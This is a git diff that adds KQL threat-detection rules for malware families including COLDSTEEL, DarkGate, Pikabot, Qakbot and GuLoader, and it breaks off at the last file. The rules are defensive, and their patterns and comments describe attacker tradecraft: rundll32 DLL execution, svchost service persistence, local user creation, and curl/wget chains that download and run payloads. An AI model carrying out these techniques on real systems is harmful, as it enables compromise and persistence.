diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql
new file mode 100644
index 00000000..fa35da9f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql
@@ -0,0 +1,10 @@
+// Title: COLDSTEEL RAT Anonymous User Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "\\Windows\\System32\\" or InitiatingProcessFolderPath contains "\\AppData\\") and AccountName contains "ANONYMOUS"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql
new file mode 100644
index 00000000..d8fadd66
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql
@@ -0,0 +1,12 @@
+// Title: COLDSTEEL RAT Cleanup Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: critical
+// Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "UpdateDriverForPlugAndPlayDevicesW" or ProcessCommandLine contains "ServiceMain" or ProcessCommandLine contains "DiUninstallDevice") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessCommandLine contains " -k msupdate" or InitiatingProcessCommandLine contains " -k msupdate2" or InitiatingProcessCommandLine contains " -k alg") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql
new file mode 100644
index 00000000..eb01a484
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql
@@ -0,0 +1,12 @@
+// Title: COLDSTEEL RAT Service Persistence Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-30
+// Level: critical
+// Description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " -k msupdate" or ProcessCommandLine endswith " -k msupdate2" or ProcessCommandLine endswith " -k alg") and FolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql
new file mode 100644
index 00000000..cb9cc6c3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql
@@ -0,0 +1,10 @@
+// Title: Potential COLDSTEEL Persistence Service DLL Creation
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql
new file mode 100644
index 00000000..5053c50b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql
@@ -0,0 +1,12 @@
+// Title: Potential COLDSTEEL Persistence Service DLL Load
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-02
+// Level: high
+// Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql
new file mode 100644
index 00000000..e899daa3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql
@@ -0,0 +1,10 @@
+// Title: Potential COLDSTEEL RAT File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\users\\public\\Documents\\dllhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql
new file mode 100644
index 00000000..1d27b967
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql
@@ -0,0 +1,10 @@
+// Title: Potential COLDSTEEL RAT Windows User Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-02
+// Level: high
+// Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "ANONYMOUS" or RegistryValueData contains "_DomainUser_") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-" and RegistryKey contains "\\ProfileImagePath")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql
new file mode 100644
index 00000000..92b68a1a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql
@@ -0,0 +1,14 @@
+// Title: DarkGate - Autoit3.EXE Execution Parameters
+// Author: Micah Babinski
+// Date: 2023-10-15
+// Level: high
+// Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
+// the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
+// command-and-control server.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe") and (FolderPath endswith "\\Autoit3.exe" or ProcessVersionInfoOriginalFileName =~ "AutoIt3.exe")) and (not((FolderPath endswith ":\\Program Files (x86)\\AutoIt3\\AutoIt3.exe" or FolderPath endswith ":\\Program Files\\AutoIt3\\AutoIt3.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..b347ed04
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
@@ -0,0 +1,13 @@
+// Title: DarkGate - Autoit3.EXE File Creation By Uncommon Process
+// Author: Micah Babinski
+// Date: 2023-10-15
+// Level: medium
+// Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.
+// This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs
+// process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other
+// processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\Autoit3.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\wmprph.exe") and FolderPath endswith "\\Autoit3.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql
new file mode 100644
index 00000000..34c15e9f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: DarkGate - User Created Via Net.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-27
+// Level: high
+// Description: Detects creation of local users via the net.exe command with the name of "DarkGate"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "DarkGate" and ProcessCommandLine contains "SafeMode") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql b/KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql
new file mode 100644
index 00000000..1a12b33a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Griffon Malware Attack Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: critical
+// Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\local\\temp\\" and ProcessCommandLine contains "//b /e:jscript" and ProcessCommandLine contains ".txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql
new file mode 100644
index 00000000..47eabde4
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql
@@ -0,0 +1,13 @@
+// Title: Injected Browser Process Spawning Rundll32 - GuLoader Activity
+// Author: @kostastsale
+// Date: 2023-08-07
+// Level: high
+// Description: Detects the execution of installed GuLoader malware on the host.
+// GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "\\rundll32.exe" and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql b/KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
new file mode 100644
index 00000000..ce83edc5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: high
+// Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "\\1.dll, DllRegisterServer" or ProcessCommandLine endswith " 1.dll, DllRegisterServer") and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..2b2918a2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-01-26
+// Level: high
+// Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Installer\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf,") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".cpl\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".inf" or ProcessCommandLine endswith ".inf\"" or ProcessCommandLine endswith ".cpl'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".inf'"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql
new file mode 100644
index 00000000..eb026653
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Pikabot C2 Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects the execution of rundll32 that leads to an external network connection.
+// The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1573, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\sndvol.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wwahost.exe") and InitiatingProcessParentFileName =~ "rundll32.exe" and Protocol =~ "tcp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql
new file mode 100644
index 00000000..abe5ceb6
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Pikabot Discovery Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups.
+// The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine in~ ("ipconfig.exe /all", "netstat.exe -aon", "whoami.exe /all")) and (InitiatingProcessParentFileName endswith "\\rundll32.exe" or (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql
new file mode 100644
index 00000000..4e73f2f9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Pikabot Hollowing Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.
+// The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\sndvol.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wwahost.exe") and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not((FolderPath endswith "\\sndvol.exe" and InitiatingProcessCommandLine contains "mmsys.cpl")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
new file mode 100644
index 00000000..9029f324
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
+// Author: Alejandro Houspanossian ('@lekz86')
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
+// Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
+// In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c") and (ProcessCommandLine contains " curl" or ProcessCommandLine contains " wget" or ProcessCommandLine contains " timeout " or ProcessCommandLine contains " ping ") and (ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " mkdir ") and (ProcessCommandLine contains " & " or ProcessCommandLine contains " || ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql
new file mode 100644
index 00000000..e0f01066
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Qakbot Rundll32 Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-24
+// Level: high
+// Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".dll" and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql
new file mode 100644
index 00000000..7161c835
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Regsvr32 Calc Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: high
+// Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s") and ProcessCommandLine endswith " calc" and FolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql
new file mode 100644
index 00000000..ab910e2b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Rundll32 Exports Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-24
+// Level: critical
+// Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "aslr" or ProcessCommandLine endswith "bind" or ProcessCommandLine endswith "DrawThemeIcon" or ProcessCommandLine endswith "GG10" or ProcessCommandLine endswith "GL70" or ProcessCommandLine endswith "jhbvygftr" or ProcessCommandLine endswith "kjhbhkjvydrt" or ProcessCommandLine endswith "LS88" or ProcessCommandLine endswith "Motd" or ProcessCommandLine endswith "N115" or ProcessCommandLine endswith "next" or ProcessCommandLine endswith "Nikn" or ProcessCommandLine endswith "print" or ProcessCommandLine endswith "qqqb" or ProcessCommandLine endswith "qqqq" or ProcessCommandLine endswith "RS32" or ProcessCommandLine endswith "Test" or ProcessCommandLine endswith "Time" or ProcessCommandLine endswith "Updt" or ProcessCommandLine endswith "vips" or ProcessCommandLine endswith "Wind" or ProcessCommandLine endswith "WW50" or ProcessCommandLine endswith "X555" or ProcessCommandLine endswith "XL55" or ProcessCommandLine endswith "xlAutoOpen" or ProcessCommandLine endswith "XS88") and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql
new file mode 100644
index 00000000..dc80e5ad
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Rundll32 Fake DLL Extension Execution
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-24
+// Level: critical
+// Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql
new file mode 100644
index 00000000..f05ad122
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Uninstaller Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-08-31
+// Level: high
+// Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\QbotUninstall.exe" or (SHA256 startswith "423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180" or SHA256 startswith "559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6" or SHA256 startswith "855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071" or SHA256 startswith "FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
new file mode 100644
index 00000000..ac8f2aa7
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE
+// Author: TropChaud
+// Date: 2023-01-26
